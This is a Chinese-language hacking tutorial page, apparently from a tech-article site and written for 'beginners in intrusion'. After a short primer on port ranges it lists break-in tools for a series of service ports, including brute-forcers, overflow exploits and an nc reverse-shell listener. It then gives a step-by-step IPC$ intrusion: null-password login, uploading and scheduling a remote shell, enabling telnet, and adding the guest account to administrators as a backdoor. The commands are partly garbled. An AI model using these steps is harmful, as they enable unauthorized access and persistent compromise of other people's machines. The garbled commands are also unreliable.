[穿透ADSL路由入侵内网另类方法]一、扫描现在很多ADSL MODEM都是通过 80 23 21 三个端口来管理，但80 21端口有很多服务器都有打开，没怎么特征性，于是我选择了23端口，打开我的至爱:SUPPERSCAN，填上我所在地区的I...+阅读

希望对新手入侵有帮助!

计算机"端口"是英文port的义译，可以认为是计算机与外界通讯交流的出口。其中硬件领域的端口又称接口，如：USB端口、串行端口等。软件领域的端口一般指网络中面向连接服务和无连接服务的通信协议端口，是一种抽象的软件结构，包括一些数据结构和I/O（基本输入输出）缓冲区。

按端口号可分为3大类：

（1）公认端口（WellKnownPorts）：从0到1023，它们紧密绑定（binding）于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如：80端口实际上总是通讯。

（2）注册端口（RegisteredPorts）：从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口，这些端口同样用于许多其它目的。例如：许多系统处理动态端口从1024左右开始。

（3）动态和/或私有端口（Dynamicand/orPrivatePorts）：从49152到65535。理论上，不应为服务分配这些端口。实际上，机器通常从1024起分配动态端口。但也有例外：SUN的RPC端口从32768开始。

1. 1433端口入侵

scanport.exe 查有1433的机器

SQLScanPass.exe 进行字典暴破(字典是关键)

最后 SQLTools.exe入侵对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

(以上反向的，测试成功)

sqlhelloz.exe 入侵ip 1433 (这个是正向连接)

2. 4899端口入侵

用4899过滤器.exe，扫描空口令的机器

3. 3899的入侵

对很早的机器，可以试试3389的溢出(win3389ex.exe)

对2000的机器，可以试试字典暴破。(tscrack.exe)

4. 80入侵

对sp3以前的机器，可以用webd入侵;

对bbs论坛，可以试试上传漏洞(upfile.exe或dvup_delphi.exe)

可以利用SQL进行注入。(啊D的注入软件)。

5. serv-u入侵(21端口)

对5. 004及以下系统，可用溢出入侵。(serv5004.exe)

对5.1.0.0及以下系统，可用本地提升权限。(servlocal.exe)

对serv-u的MD5加密密码，可以用字典暴破。(crack.vbs)

输入一个被serv-u加密的密码(34位长)，通过与字典档(dict.txt)的比较，得到密码

6. 554端口

用real554.exe入侵。

7. 6129端口

用DameWare6129.exe入侵。

8. 系统漏洞

利用13

5、445端口，用ms0302

6、ms0303

9、ms0304

9、ms04011漏洞，进行溢出入侵。

9. 3127等端口

可以利用doom病毒开的端口，用nodoom.exe入侵。(可用mydoomscan.exe查)。

10. 其他入侵

利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。

经典IPC$入侵

1. C:\>use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"

这是用"流光"扫到的用户名是administrators，密码为"空"的IP地址(气好到家如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。

2. C:\>copy srv.exe $">\\127.0.0.1\admin$

先复制srv.exe上去，在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了)。

3. C:\>time file: 127.0.0.1/

查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。

4. C:\>at file: 127.0.0.1/ 11:05 srv.exe

用at命令启动srv.exe吧(这里设置的时间要比主机时间快，不然你怎么启动啊.

5. C:\>time file: 127.0.0.1/

再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。

6. C:\>tel 127.0.0.1 99

这里会用到Tel命令吧，注意端口是99。Tel默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以Tel上去了，但是SRV是一次性的，下次登录还要再激活!所以我们打算建立一个Tel服务!这就要用到ntlm了

7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$

用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。

8. C:\WINNT\system32>ntlm

输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候，就说明已经启动正常。然后使用" start tel"来开启Tel服务!

9. Tel 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在Dos上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组

10. C:\>user guest /active:yes

将对方的Guest用户激活

11. C:\>user guest 1234

将Guest的密码改为1234,或者你要设定的密码

12. C:\>localgroup administrators guest /add

将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机)

以下为关联文档：

网络端口基础知识111端口：111端口是SUN公司的RPC（Remote Procedure Call，远程过程调用）服务所开放的端口，主要用于分布式系统中不同计算机的内部进程通信，RPC在多种网络服务中都是很重要的组件。...

解读IDS入侵检测系统术语入侵检测技术07年已经取得了越来越多的应用，很多用户对IDS(入侵检测系统)具体信息并不是十分了解，但随着其快速发展，我们有必要了解IDS，为日后做好准备。与IDS相关的新名词也日...

dlink无线路由器的端口映射怎么设置举例：本文假设把80端口映射中局域网中的192.168.0.100计算机上面，建议把电脑的ip地址手动设置为192.168.0.100. 1、登录管理界面：在浏览器中输入：192.168.0.1并按回车键----在弹...

Windows端口映射实现外网访问内网Windows端口映射实现外网访问内网由于公网IP地址有限，不少ISP都采用多个内网用户通过代理和网关路由共用一个公网IP上INTER的方法，这样就限制了这些用户在自己计算机上架设个...

从入侵检测到入侵防御入侵检测系统通过对计算机网络或系统中的若干关键点收集信息并对其进行分析，从中发现是否有违反安全策略的行为和被攻击的迹象，它不仅能检测来自外部的入侵行为，同时也监督内部...

入侵检测系统常用的检测方法入侵检测系统常用的检测方法有特征检测、统计检测与专家系统。据公安部计算机信息系统安全产品质量监督检验中心的报告，国内送检的入侵检测产品中95％是属于使用入侵模板进行模...

修改子交换机级联端口工作模式在规模稍微大一些的局域网网络中，要是子交换机的级联位置发生变动的话，那么先前在该子交换机中划分的虚拟子网通常就不会产生作用了。如此说来，当子交换机的级联位置发生变动的...

一种入侵检测模式算法新技术日前，启明星辰公司在IDS/IPS产品中成功地研制和实现了一种高效的自适应模式匹配VAPM方法(Venus Adaptive Pattern Match)。该方法根据网络攻击指纹(模式)特征和协议变量特征...

入侵监测系统的功能与作用入侵检测技术IDS是一种主动保护自己免受攻击的一种网络安全技术。作为防火墙的合理补充，入侵检测技术能够帮助系统对付网络攻击，扩展了系统管理员的安全管理能力（包括安全审计...